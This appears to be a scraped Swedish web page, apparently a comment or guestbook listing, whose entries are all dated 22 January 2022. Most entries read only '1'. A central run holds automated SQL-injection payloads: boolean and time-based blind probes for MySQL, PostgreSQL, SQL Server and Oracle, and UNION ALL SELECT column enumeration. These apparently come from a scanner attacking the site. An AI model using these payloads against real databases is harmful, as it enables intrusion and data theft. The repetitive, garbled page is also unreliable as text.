1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1....).)'(. lördag, 22 januari 2022:

1'eCtYOv<'">gZibMl lördag, 22 januari 2022:

1) AND 7945=7480 AND (8992=8992 lördag, 22 januari 2022:

1) AND 8754=8754 AND (7565=7565 lördag, 22 januari 2022:

1 AND 8656=4584 lördag, 22 januari 2022:

1 AND 8754=8754 lördag, 22 januari 2022:

1 AND 8399=1578-- pVRi lördag, 22 januari 2022:

1 AND 8754=8754-- MApy lördag, 22 januari 2022:

1') AND 1145=7069 AND ('HGev'='HGev lördag, 22 januari 2022:

1') AND 8754=8754 AND ('TPhk'='TPhk lördag, 22 januari 2022:

1' AND 8415=6744 AND 'UMlW'='UMlW lördag, 22 januari 2022:

1' AND 8754=8754 AND 'SBZG'='SBZG lördag, 22 januari 2022:

1%' AND 4118=8060 AND '%'=' lördag, 22 januari 2022:

1%' AND 8754=8754 AND '%'=' lördag, 22 januari 2022:

(SELECT (CASE WHEN (4089=6991) THEN 4089 ELSE 4089*(SELECT 4089 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) lördag, 22 januari 2022:

(SELECT (CASE WHEN (8763=8763) THEN 8763 ELSE 8763*(SELECT 8763 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) lördag, 22 januari 2022:

(SELECT CONCAT(0x7171767a71,(SELECT (ELT(2497=2497,1))),0x717a766a71)) lördag, 22 januari 2022:

1);SELECT SLEEP(5)# lördag, 22 januari 2022:

1;SELECT SLEEP(5)# lördag, 22 januari 2022:

1');SELECT SLEEP(5)# lördag, 22 januari 2022:

1';SELECT SLEEP(5)# lördag, 22 januari 2022:

1%';SELECT SLEEP(5)# lördag, 22 januari 2022:

1);SELECT PG_SLEEP(5)-- lördag, 22 januari 2022:

1;SELECT PG_SLEEP(5)-- lördag, 22 januari 2022:

1');SELECT PG_SLEEP(5)-- lördag, 22 januari 2022:

1';SELECT PG_SLEEP(5)-- lördag, 22 januari 2022:

1%';SELECT PG_SLEEP(5)-- lördag, 22 januari 2022:

1);WAITFOR DELAY '0:0:5'-- lördag, 22 januari 2022:

1;WAITFOR DELAY '0:0:5'-- lördag, 22 januari 2022:

1');WAITFOR DELAY '0:0:5'-- lördag, 22 januari 2022:

1';WAITFOR DELAY '0:0:5'-- lördag, 22 januari 2022:

1%';WAITFOR DELAY '0:0:5'-- lördag, 22 januari 2022:

1);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(66)||CHR(104)||CHR(87),5) FROM DUAL-- lördag, 22 januari 2022:

1;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(66)||CHR(104)||CHR(87),5) FROM DUAL-- lördag, 22 januari 2022:

1');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(66)||CHR(104)||CHR(87),5) FROM DUAL-- lördag, 22 januari 2022:

1';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(66)||CHR(104)||CHR(87),5) FROM DUAL-- lördag, 22 januari 2022:

1%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(66)||CHR(104)||CHR(87),5) FROM DUAL-- lördag, 22 januari 2022:

1) AND SLEEP(5) AND (8865=8865 lördag, 22 januari 2022:

1 AND SLEEP(5) lördag, 22 januari 2022:

1 AND SLEEP(5)-- TKYX lördag, 22 januari 2022:

1') AND SLEEP(5) AND ('pNth'='pNth lördag, 22 januari 2022:

1' AND SLEEP(5) AND 'RjRs'='RjRs lördag, 22 januari 2022:

1%' AND SLEEP(5) AND '%'=' lördag, 22 januari 2022:

1) AND 6099=(SELECT 6099 FROM PG_SLEEP(5)) AND (3166=3166 lördag, 22 januari 2022:

1 AND 6099=(SELECT 6099 FROM PG_SLEEP(5)) lördag, 22 januari 2022:

1 AND 6099=(SELECT 6099 FROM PG_SLEEP(5))-- FuwC lördag, 22 januari 2022:

1') AND 6099=(SELECT 6099 FROM PG_SLEEP(5)) AND ('esNc'='esNc lördag, 22 januari 2022:

1' AND 6099=(SELECT 6099 FROM PG_SLEEP(5)) AND 'fcxh'='fcxh lördag, 22 januari 2022:

1%' AND 6099=(SELECT 6099 FROM PG_SLEEP(5)) AND '%'=' lördag, 22 januari 2022:

1) WAITFOR DELAY '0:0:5' AND (6114=6114 lördag, 22 januari 2022:

1 WAITFOR DELAY '0:0:5' lördag, 22 januari 2022:

1 WAITFOR DELAY '0:0:5'-- hray lördag, 22 januari 2022:

1') WAITFOR DELAY '0:0:5' AND ('QvtT'='QvtT lördag, 22 januari 2022:

1' WAITFOR DELAY '0:0:5' AND 'UhKl'='UhKl lördag, 22 januari 2022:

1%' WAITFOR DELAY '0:0:5' AND '%'=' lördag, 22 januari 2022:

1) AND 4071=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(83)||CHR(67)||CHR(66),5) AND (6756=6756 lördag, 22 januari 2022:

1 AND 4071=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(83)||CHR(67)||CHR(66),5) lördag, 22 januari 2022:

1 AND 4071=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(83)||CHR(67)||CHR(66),5)-- gSKT lördag, 22 januari 2022:

1') AND 4071=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(83)||CHR(67)||CHR(66),5) AND ('aOnU'='aOnU lördag, 22 januari 2022:

1' AND 4071=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(83)||CHR(67)||CHR(66),5) AND 'Eyqb'='Eyqb lördag, 22 januari 2022:

1%' AND 4071=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(83)||CHR(67)||CHR(66),5) AND '%'=' lördag, 22 januari 2022:

1) ORDER BY 1-- zDyG lördag, 22 januari 2022:

1) ORDER BY 1560-- eDrT lördag, 22 januari 2022:

1) UNION ALL SELECT NULL-- ESJW lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL-- sTFr lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL,NULL-- eSOV lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL,NULL,NULL-- DzkN lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- weMX lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- abQB lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- gNiJ lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- dBFZ lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- JyVI lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- vJfx lördag, 22 januari 2022:

1 ORDER BY 1-- VuxM lördag, 22 januari 2022:

1 ORDER BY 1110-- WIjx lördag, 22 januari 2022:

1 UNION ALL SELECT NULL-- CkQk lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL-- XdAV lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL-- fEwv lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL-- cLfH lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- dlMg lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- halJ lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- GrlR lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- MTlS lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ylce lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- fawL lördag, 22 januari 2022:

1 ORDER BY 1-- QkRQ lördag, 22 januari 2022:

1 ORDER BY 3314-- EccL lördag, 22 januari 2022:

1 UNION ALL SELECT NULL-- kKvY lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL-- txED lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL-- AsGM lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL-- waIf lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- Ypli lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- hedy lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- NrEX lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- eUxQ lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- QiWa lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- HopZ lördag, 22 januari 2022:

1') ORDER BY 1-- CRSL lördag, 22 januari 2022:

1') ORDER BY 1995-- FPZj lördag, 22 januari 2022:

1') UNION ALL SELECT NULL-- BAow lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL-- YtUR lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL,NULL-- OAcU lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL,NULL,NULL-- Dgdw lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- fOwd lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- EdUo lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- qjgQ lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- TypW lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- iAiH lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- BNoE lördag, 22 januari 2022:

1' ORDER BY 1-- orZP lördag, 22 januari 2022:

1' ORDER BY 7574-- fMjf lördag, 22 januari 2022:

1' UNION ALL SELECT NULL-- hplm lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL-- rcra lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL,NULL-- YAFQ lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL,NULL,NULL-- EUcw lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- mgpA lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- NeGf lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- SBpu lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Dvct lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- xwOg lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- thRw lördag, 22 januari 2022:

1%' ORDER BY 1-- Zmrx lördag, 22 januari 2022:

1%' ORDER BY 5976-- PKzt lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL-- fknZ lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL-- kADp lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL,NULL-- GTap lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL,NULL,NULL-- fiWn lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- aoIB lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- sVdM lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- DglQ lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- LaiP lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- rqAF lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- zHmM lördag, 22 januari 2022:

1) ORDER BY 1# lördag, 22 januari 2022:

1) ORDER BY 5903# lördag, 22 januari 2022:

1) UNION ALL SELECT NULL# lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL# lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL,NULL# lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1 ORDER BY 1# lördag, 22 januari 2022:

1 ORDER BY 7193# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1 ORDER BY 1# lördag, 22 januari 2022:

1 ORDER BY 8073# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1') ORDER BY 1# lördag, 22 januari 2022:

1') ORDER BY 5442# lördag, 22 januari 2022:

1') UNION ALL SELECT NULL# lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL# lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL,NULL# lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1' ORDER BY 1# lördag, 22 januari 2022:

1' ORDER BY 1954# lördag, 22 januari 2022:

1' UNION ALL SELECT NULL# lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL# lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL,NULL# lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1%' ORDER BY 1# lördag, 22 januari 2022:

1%' ORDER BY 7575# lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL# lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL# lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL,NULL# lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

1 lördag, 22 januari 2022:

